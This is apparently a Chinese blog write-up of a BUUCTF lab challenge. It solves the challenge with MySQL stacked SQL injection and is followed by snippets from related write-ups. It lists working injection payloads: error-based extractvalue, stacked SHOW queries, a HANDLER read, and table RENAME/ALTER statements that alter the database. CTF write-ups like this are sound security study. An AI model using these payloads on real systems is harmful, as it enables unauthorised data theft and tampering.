buu web:随便注(MySQL堆叠注入)

已于 2022-04-07 09:18:50 修改
阅读量1.1k 收藏 4
点赞数 1
分类专栏: buuctf 文章标签: web安全
于 2022-04-01 10:08:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55378150/article/details/123790437
版权

打开靶场,发现是一个查询框

输入1' ,报错,说明存在sql注入漏洞

二分法order by 查字段

1' order by 2;# 正常;

1' order by 3;# 报错;

得出字段数为2

联合查询-1' union select 1,2;#,发现有过滤

联合查询估计是不行了

既然有报错,那我们就试一下报错注入1' and extractvalue(1, concat(0x7e,database(),0x7e))#

 

成功爆出当前数据库supersqli,但是后面的注入不可避免的要用到select,所以只能pass了

接下来试一下堆叠注入1';show databases;#

成功列出数据库,貌似可行,我们继续1';show tables;# 

 

爆出当前数据库的两张表,分别看一下里面有什么

1';show columns from `1919810931114514`;#(注意:列表名为数字时要用反引号括起来(看别人的wp))

 1';show columns from words;#

 很明显,flag在数字表里,但是怎么搞出来呢?不会,只能又跑去看一下别人的wp,大佬们各种各样的方法令我直呼牛*,下面介绍一下两种目前笔者看得懂的方法

1.利用handler语句

 原理解释:        

        HANDLER语句使我们能够一行一行的浏览一个表中的数据,handler 语句并不具备 select 语句的所有功能,它是 MySQL 专用的语句,并没有包含到SQL标准中。

 语法:

        打开句柄:handler handler_table open;       

        查看数据:handler handler_table read first/next/prev/last;

        关闭句柄:handler handler_table close;

payload:1';handler `1919810931114514` open;handler `1919810931114514` read first;#

成功

2.利用重命名的方法,使查询框查询数字表里的flag信息

        因为当前数据库下只有两张表,所以我们不难判断出查询语句大概是这样select id,data from words where id=,所以我们的思路就是将words表换成其他表,再将数字表换成words表,新 words 表添加新的列名 id 默认值为1,将 flag 改名为 data 

payload:1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int(10) default 1;alter table words change flag data varchar(100);#

然后-1';show tables;show columns from words;#看一下有没有成功

没问题,直接输入1,拿到flag

(蒸滴骚) 

m0_55378150
关注
专栏目录
BUUCTF-Web-随便-wp
single7_的博客
12-14 380
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
BUU web -Easysql
m0_52314120的博客
11-15 2378
来自2019年的极客大挑战 题目叫做Easy sql而实际上而非常的简单 首先展示打开后的页面 随即填入后出现报错 题目提示sql注入,首先尝试单引号避开后发现报错 查看源码后尝试or避开判断直接使用php的万能密码 直接得到flag ...
CTF [强网杯 2019]随便 Writeup 堆叠注入
baynk的博客
03-31 1452
讲道理,最不虚的就是注入了。 随意加上单引号。 单引号闭合,尝试1' and 1=2 # 无回显,应该成功执行了,再来1=1确认下。 又有报错信息,想着直接上updatexml()。 结果报错,又试了exp()和extractvalue(),结果exp()到是能用,extractvalue()直接报无函数 。。。 不过有函数也没意义阿。因为select也被检测了,尝试了若干方法绕过后,放...
BUUCTF】web之强网杯2019随便
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
MySQL堆叠注入
qq_39654116的博客
01-05 539
目录堆叠注入简介对照表格语句 堆叠注入 简介 堆叠注入mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句,堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库 对照表格 PHP连接MySQL数据库有三种方式(MySQLMysqli、PDO),同时官方对三者也做了列表性比较: Mysqli PDO MySQL 引入的PHP版本 5.0 5.0
堆叠注入——BUUCTF-随便
ancan8807的博客
09-07 657
由题目提示知道,这题需要进行sql注入 输入1'发现报错 再输入1';show batabases#出现了一大堆数据库 再输入1';show tables#出现了两个表 猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现 因为select被过滤了,所以先将select *...
BUUCTF——随便
weixin_45864041的博客
09-21 752
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql注入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql注入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行注入,所以我们换一个思路,看一看是否可以进行堆叠注入 通过上面的测试可以看到,可以进行堆叠注入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
Mysql注入 -- 堆叠注入
weixin_41489908的博客
05-25 1291
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。 ---- 网易云热评 一、堆叠注入介绍 1、多条sql语句同时执行 2、union只能执行查询语句,堆叠可以执行增删改查 3、同时执行三条语句 select 1;select 2;select 3; 二、插入注入 1、找到注入点,添加一条数据 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
【愚公系列】2024年03月 《CTF实战:从入门到提升》 004-Web安全基础知识(基础工具使用)
热门推荐
时光隧道
02-26 5万+
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决一系列与网络安全相关的问题,获取旗帜并积分。CTFWeb安全基础工具则是在CTF中用于进行Web安全攻防的工具。作用和意义描述简化攻防过程CTFWeb安全基础工具提供了各种自动化和半自动化的工具,可以帮助参赛者快速进行渗透测试、漏洞挖掘和攻击。这些工具可以简化繁琐的攻击过程,提高效率。快速发现漏洞CTFWeb安全基础工具集成了各种漏洞扫描和渗透测试工具,可以帮助参赛者快速发现Web应用程序中的漏洞。
[初级]sql注入BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3836
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
buu web:EasySQL(MySQL堆叠注入
m0_55378150的博客
04-01 1510
打开靶机,发现是一个查询框 输入1,提交,有回显 输入1',提交,没有回显,应该是没有显示报错信息,那么报错注入就行不通了 然后就是联合查询,时间盲,布尔盲堆叠注入等一顿输出,发现除了堆叠之外,其他基本上都是有过滤的,如下 那我们就用堆叠呗,输入1';show databases;,发现没回显,难道是数字型注入?输入1;show databases;,果然成功爆出数据库 接下来看看当前数据库下有哪些表,1;show tables; flag应该就在这里了,但是过滤...
MySQL堆叠注入
yuan_boss的博客
08-23 1357
可以看到有个表名为users,可以很容易猜测到这是存用户信息的表,所以可以通过sql注入查找这个表的字段名。通过以上操作,可以知道存密码的地方在users表中,而且密码字段名字为password。再次正常访问,即可发现密码已经修改成了654321。堆叠注入需要使用分号表示一个sql语句的结束。任务:对38关进行修改密码,删库,恢复环境。38关,堆叠查询,修改密码为654321。通过堆叠注入即可完成修改密码的操作。
BUUCTF-随便
最新发布
m0_74167420的博客
03-10 1550
报错注入:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。堆叠注入mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠注入其实就是通过结束符来执行多条sql语句。(1)报错盲,构建payload:第一种payload:inurl?
buuctf-随便
xixihahawuwu的博客
11-23 283
上没有什么提示,进入环境 有一个提交查询,点击查询,数字为1时回显如下 数字为2回显如下,且文本框内数字自动变为1 当数字大于2时,页面不会返回内容。说明字段数为2 看下源码 咳咳,这就过分了哈.我偏要用 先试下’ 再select下 回显了关键字的过滤,union注入没法用 这里有一个知识点就是“堆积注入” 其实就是加了;之后接着注入 1’;show databases;爆下数据库 再爆个表 好啊。尝试下把表内容爆出来 1’;show columns from words; 没啥有用的 下一个,这
MYSQL 堆叠注入详解
AaronLuo
09-19 4503
堆叠注入与受限于select语句的联合查询法相反,堆叠注入可用于执行任意SQL语句。简单地说就是MYSQL的多语句查询 堆叠注入的局限性:堆叠注入并不是在哦任何换环境下都可以执行的,可能受到API或者数据库引擎不支持的限制(如Oracle数据库),也有可能权限不足。web系统中,因为代码通常只返回一个查询结果,因此堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因...
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 468
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
BUUCTF之随便
金 帛的博客
04-03 5469
BUUCTF的WP
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3244
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值